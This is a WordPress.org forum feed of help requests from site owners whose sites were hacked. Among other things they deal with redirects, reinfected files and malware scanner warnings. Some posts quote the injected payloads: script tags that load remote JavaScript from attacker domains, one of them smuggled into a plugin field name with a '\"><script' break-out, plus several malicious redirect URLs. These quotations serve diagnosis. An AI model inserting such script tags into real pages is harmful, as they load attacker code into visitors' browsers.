Channel: Topic Tag: malware | WordPress.org
Viewing all 3850 articles

Spammy site redirect

My site is being redirected to:
‘https://1.tellmebluehistory.icu/?p=gqydoobwg45gi3bpgqytk&sub1=Xil&sub2=refers.v1’

This code can be found in the header of literally all posts and pages of the site:
<script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script>

This is an old site that we keep around because it has more traffic than the new one that we are working on, and we want to keep it around until the new site is more visible. We don’t update its plugins anymore except with the same posts we make on our new site. Some premium plugins are very outdated and I know this is a security issue, but we don’t want to spend the money on them.

The main problem is that the wp-admin page is also redirected and I have no idea where to look for malicious code to get this fixed, as if I could log in, I could install some security plugins.

What I did so far is follow various tutorials on site hacks, trying to clean the files.
I removed malicious code from functions.php and malicious php files like wp-tmp.php etc.

I searched file contents for base64_decode.

I checked the .htaccess file and it seems clean (no contents at all).

I ended up putting completely fresh WordPress files with the old database, and the redirect still remained.

Then I saw that the script above was in all post content basically, so I deleted the script from the database after doing a backup. The redirect still remains. I also checked if any new users have registered recently, but that is not the case.

UPDATE: I have also cloned the empty site with the old database to a new domain and it is not redirecting there.

So I am out of ideas on this right now.

Any ideas/help with this issue would be greatly appreciated.


wpadmin URL redirects randomly

I manage a website hosted on a paid host. Lately, I am redirected to what looks like malicious websites on the first click on the wpadmin URL. If I ignore the new tab and click on the wpadmin URL, I can reach it. I called the host support and they said that your site is infected as shown by Sucuri and you will need to pay $XXX to get it security enabled. I checked with Sucuri and it flags a visitor counter script I had installed as the malware, so a fake alert. I tried a few other plugins and none of them indicates any issue. How do I fix this?
One URL I am getting redirected to is
https://lp.searchdimension.com/12/?info=1&v=400#sdapp93
I have not copied the other one.

I wonder if it is my browser that is infected or the website.
Thanks

Potential Malware Detected in Clearfy

Hi, I’m using the Shield Security plugin and its Malware scanner (https://www.icontrolwp.com/blog/wordpress-core-file-scanner-automatic-repair/) detected some potential malware in the Clearfy code. Here’s what it says:

The following files contain suspected malware:
- wp-content/plugins/clearfy/admin/pages/components.php

What is causing this and should I be worried?

Thanks

Plugin not supported; open to malware – uninstall now!

Hello,

Since this plugin is no longer on the repository or supported, it is highly suggested to remove this plugin. 3 of 4 of my sites using it were affected by the script malware described in https://blog.sucuri.net/2018/08/massive-wordpress-redirect-campaign-targets-vulnerable-tagdiv-themes-and-ultimate-member-plugins.html which redirects to malware, porn, or otherwise. Deactivating and removing the plugin fixed this.

Access denied – File permissions need to be reset

Hello all,

Hoping someone can share their experience and shed some light. My client site keeps getting the Access Denied message on the screen (4-5 times in the last few months) so I have to go in and change the file permissions back to what they should be rather than zero. I asked the host (ipower.com) why this keeps happening and they suggested some malware might be doing this. I called Sitelock, who regularly scans our site for malware, and they did not see any. They suggested that it might be at the host server level, which they cannot reach to scan. We both got on the phone with the host, ipower.com, and the Sitelock guy asked them to find out if it was a bad cron job or if the site was “stuck” or if there was malware at their server level. ipower assured me they’d escalate the issue and I’d hear back. I’m not too confident I’ll hear anything concrete. Would they admit to malware in their server?

Has anyone else experienced this and if so, did they figure out what was causing it?

Thanks in advance!

Malware files appear in files

How do I make WordPress work well without being able to create new files or edit files in the entire WordPress directory? I want to avoid viruses because recently I got malware files; I deleted them, and a few days later they appeared again, or lines of malware code were written to wp-settings.php. I have now used chmod on wp-settings.php so that nobody can write to the file.
I used the most popular malware cleaning plugins to clean WP and even reinstalled the whole of WordPress, but got the same result. I also have multiple WordPress installs on that hosting.

Hack related to Simple Fields?

I noticed today our website had problems, and yesterday it was fine. I was about to add a new post for a custom post type, the same as I had done yesterday, but I noticed none of the special fields that come from Simple Fields were where they were supposed to be on the edit page. It looked like a plain edit page.

Then I noticed all the pages on our website that used Simple Fields didn’t work – just showed header and footer but contents were empty.

I started digging and I went to the Simple Fields area in Settings and immediately noticed all of our Field Groups and Post Connectors were gone. There was just one Field Group called “test” and one “Post Connector” that had the following under name –

“><script type=text/javascript src=’https://bes.belaterbewasthere.com/corn/flex.js?tp=1$v88′></script>

That must have been put in there maliciously by a bot or hacker or something. I have no idea what that URL is, and having a JS file URL in there looks bad.

As far as I could tell, the WordPress admin showed everything else looking normal. Any Edit screens for a post type that had Simple Fields was lacking those Simple Fields. And a large portion of our pages didn’t work properly because the Simple Fields were not working.

We did have a backup that we reloaded successfully, and we’ll have more things to add back in since the last backup, but that is doable. However, we don’t know how this could have occurred and we don’t currently have a way to prevent it from happening again.

I just noticed on the plugin page –
https://wordpress.org/plugins/simple-fields/
It says in red background –
“This plugin has been closed as of September 16, 2019 and is not available for download. This closure is temporary, pending a full review.”

That is recent and it is interesting that it is a temporary closure and there will be a review. Perhaps someone is aware of a serious problem. Does anyone know more about this?

I also found in a simple-fields.com blog post that the plugin is not under development any longer. And it was even for sale. But WordPress.org shows the plugin was last updated 4 years ago so I don’t think anything nefarious could have gotten into the plugin code recently.
http://simple-fields.com/blog/

I don’t even know for sure if the Simple Fields plugin was the original vulnerability, but that is my best guess. We will check web server and network logs.

I guess if there is no short-term solution, then the long-term solution for us would be to use an alternative plugin to Simple Fields. That would be a huge undertaking.

Any input would be appreciated!

Hacked website

Hi,

During the past weeks, I have been trying to get rid of some malware I suppose.

Last month, I noticed my website was redirected to malicious websites after clicking anywhere on the page.

I ran scans with all kinds of security plugins (Wordfence, Cerber, Malcure, just to name a few…)

Except for Malcure, which detected malicious code in the database, none of the scans revealed malicious files on the server.

Yet, I reuploaded a clean version of WordPress except for the content folder, and I deleted weird files I could see through FTP in the uploads folders.

With phpMyAdmin, I looked for the malicious URL my website was redirected to (dolohen.com) to see which tables were infected. Then I manually cleaned the infected tables, which were wp_posts and wp_options.

I changed my admin password, and all the editors, and authors passwords on the website. I changed the database user, and password etc.

I had tried securing the website with .htaccess (disallowing editing via wordpress, disallowing certain uploads…)

But it kept coming back…

Then I noticed another issue which was a pop-up window asking people to click to continue browsing the website (p79479.com).

So, I did the same thing all over again.

Now, my admin password has changed twice already today. I had to reset it. So, I added 2 factor authentication… I searched for the aforementioned bits of malicious code in my database, and didn’t find anything.

Yet, I’m not sure my site is completely clean, and my host doesn’t provide those kinds of services. Thus, here I am, asking for help.

Has anyone ever dealt with dolohen.com / p79479.com hacks?

Thanks in advance for your feedback.


File Change Warning, is this normal?

I have consistently gotten file change warnings (and warnings of brute force attacks) since I started my hobby blog over a year ago. I’ve tried different things to shore up the security but they still happen, but I also don’t know if some of the more recent file change notifications are bad or not, because I have been making a lot of changes. The most recent I got was this:

url: WP-Cron Scheduled Task
Changed:
wp-content/uploads/sucuri/sucuri-plugindata.php
wp-content/uploads/sucuri/sucuri-auditlogs.php
wp-content/uploads/sucuri/sucuri-failedlogins.php
wp-content/uploads/sucuri/sucuri-oldfailedlogins.php
wp-content/uploads/sucuri/sucuri-settings.php
wp-content/uploads/sucuri/sucuri-auditqueue.php
wp-content/uploads/sucuri/sucuri-sitecheck.php
Removed:
Added:
wp-content/uploads/siteground-optimizer-assets/twentyseventeen-customize-preview.min.js

Does this look like a problem/hack/malware?
Any input is appreciated!

Website Hacked ! Don’t use it !

Like other users, my website was hacked with malicious code and after that nothing was working well because I had a lot of redirects to several websites.. I lost a week trying to solve all the problems myself.. I hope WordPress pays attention to this kind of dishonest behaviour risking people’s work !..

Malware Database Infection.

Hello,

First of all, thank you for this extraordinary theme! Maybe the best theme outside there! 🙂

I wanted not just to say thank you, but to tell you something that has happened with your theme:

My website was hacked weeks ago.. It was terrible and my site was very infected.. after a deep cleaning.. I found in my database several website links and I was wondering if all those links were a virus or malware from the attack.. I’ve checked some of those websites and yes.. effectively some of them contained viruses and malware. My surprise started when I noticed that those links were inserted into text written by Oceanwp / Blog.

I’ve searched portions of those texts on Google and I found that they were written for people participating on your blog / site. My questions are:

– Why does my website have all those full blogs / texts inserted in my database with links, some of them containing viruses / malware ?? How can this be possible ??
– How can I clean all those texts and where specifically are they hidden ??
– Is my website receiving those texts periodically ?? (I think that yes! Because some of those texts are from July and August..)
– Did you check all the people that write on your Website / Blog ??
– Is OceanWP theme really safe to use ??
– Are you using my website to redirect people to your website ??

I would really like a good explanation because maybe I’m missing something or I’m wrong! But I’m very sure that I don’t want those “news” updated on my database with dangerous links.

Below I’ll share some texts (that you can search by yourself on google) and you’ll find your own Oceanwp blog:

When it comes to WordPress, then it is considered as one of the best content management system. It is easy to use that is the main reason why its demand is increasing day by day.

Keywords are phrases or separate words that show Google that your article is relevant to its topic. If your article’s theme is on 15 SEO tips and techniques to boost ranking on WordPress

is what sets big brands from mediocre ones. It allows you to create a recognizable brand personality across multiple channels and, above all, to build stronger relationships with your target audiences

And here I’ll share some useless links that I found on my database that came from those entire inserted blogs on my database (only open if you have an antivirus!):

[redacted – please do not post links to malware]

Thank you for your answers and support on this Topic !

Why does WordPress allow outdated plugins in their directory?

Why does WordPress allow garbage like this to still be listed in their directory? The plugin does not work and now it still redirects to my subdomain and doesn’t work even after uninstalling it.

Now, I have to comb through my database to remove the redirect to find out what it did to my file manager.

Given all the malware that’s been infesting your plugin directory – it would seem to me you folks should be on top of this crap.

Redirects towards ad. website

Please check this link: it will take you to an advertisement website first, and on the 2nd load it will take you to the exact site. This is ad malware on the website. Due to this malware, Facebook is not accepting my website’s link bosspakistan.com. Please, can anyone guide me on what this problem is and how Wordfence can fix this issue?
I can’t run any campaign on social media channels as the URL of my site is not accepted by them due to this malware.

Connection with online server

Sorry for such a dummy question. I don’t have very strong network security knowledge. Could you please explain one thing about your plugin’s workflow? Does it require an external connection to some online server, or does your malware scanner work offline?
For example, if I install it on the internal blog of our company office, is it going to work without a direct internet connection?

Changing registration email address

Hello, there seems to be a problem with getting the lost password link that WordPress sent to my email server. Each time WordPress supposedly sent a link to my email address to reset the lost password, I never received one. This has happened a couple of times. It seems as though my email server and WordPress do not connect (no message in the junk folder either). I didn’t pay much attention since I did not need to change my password. However, within the last 12 months my website was hacked by malware twice (the last one 3 days ago). It is becoming important to change my WordPress login password. Since my current email address never gets the WordPress link, it is probably better that I change my registration email address to another one (a more reliable one). That way I can get the link that WordPress sends. So how can I change my registration email address on WordPress.org?


Strange url that I didn’t post coming from Bing- malware?

Hi, I’ve had WP for over 10 years, have several blogs with little traffic. Yet here I still am!

I just removed some nofollows I had on my blogs to stop search engines from scraping my own cartoons. However, seems like Google demands images or I won’t show up in search at all.

I noticed Palo Alto using the address url above: https://chocolatecartoons.com/boumboumboum and it’s giving a 404.

This is not a post of mine, nor an image. What is it, can you tell? I can see in search it’s the name of some song, but is this just some malicious attack, to give me 404s? Any ideas?

Malware Detected?

I did a security scan (Linux Malware Detect + ClamAV) of my WordPress files. The scan quarantined 1 file.

TOTAL FILES: 30741
TOTAL HITS: 1
TOTAL CLEANED: 0

[ deleted, don’t post that here ]

I’d love some input here… can anyone help me decode what’s happening in that line of code?

MALWARE FOUND

Every site where I installed this plugin contained malware.
Since I switched to SlimStat, no more problems!
The malware does not show the porn-site pop-ups on your own computer / IP!
Please check!

“Too few arguments” in error.log

Hi,
I got the following warning in my error.log of iThemes Security:
“PHP Warning: printf(): Too few arguments in /home/dierenduintje/public_html/wp-content/plugins/better-wp-security/core/modules/malware/settings-page.php on line 52”
My site is on dierenduintje.nl
Could you please tell me what I can do about it?
Thanks!
Kees Koopman

Symantec 30548 web attack jscoinminer website detected

Hi,

Recently I had malware on my website that redirected to another site in a new tab. That behavior doesn’t happen anymore. But I am seeing this message every time there is a website page.

Any ideas?
